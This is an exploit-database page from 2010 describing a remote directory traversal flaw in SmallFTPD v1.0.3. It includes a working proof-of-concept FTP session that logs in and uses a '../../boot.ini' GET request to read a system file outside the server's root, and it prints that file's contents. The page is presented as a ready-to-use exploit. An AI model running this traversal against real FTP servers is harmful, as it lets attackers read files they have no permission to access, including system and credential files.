[remote exploits] - SmallFTPD v1.0.3 Remote Directory Traver
Posted on 31 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability by Pr0T3cT10n in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================================= SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability ========================================================= # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # SmallFTPD is vulnerable for a path traversal, the following will explain you how to read files # The vulnerability allows an unprivileged attacker to read files whom he has no permissions to. # The vulnerable FTP command are: # * GET - Read File #----------------------------------- # Vulnerability Title: SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability # Date: 31/10/2010 # Author: Pr0T3cT10n # Software Link: http://sourceforge.net/projects/smallftpd/files/smallftpd/smallftpd-1.0.3-fix/smallftpd-1.0.3-fix.zip/download # Affected Version: 1.0.3 # Tested on Windows XP Hebrew, Service Pack 3 # ISRAEL, NULLBYTE.ORG.IL ### Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:Documents and SettingsAdmin>ftp 127.0.0.1 Connected to 127.0.0.1. 220- smallftpd 1.0.3 220- check http://smallftpd.free.fr for more information 220 report bugs to smallftpd@free.fr User (127.0.0.1:(none)): test 331 User name okay, password required. Password: 230 User logged in. ftp> get ../../boot.ini 200 Port command successful. 150 Data connection ready. 226 Transfer complete. ftp: 211 bytes received in 0.00Seconds 211000.00Kbytes/sec. ftp> bye 221 Good bye. C:Documents and SettingsAdmin>type boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-31]</pre></body></html>
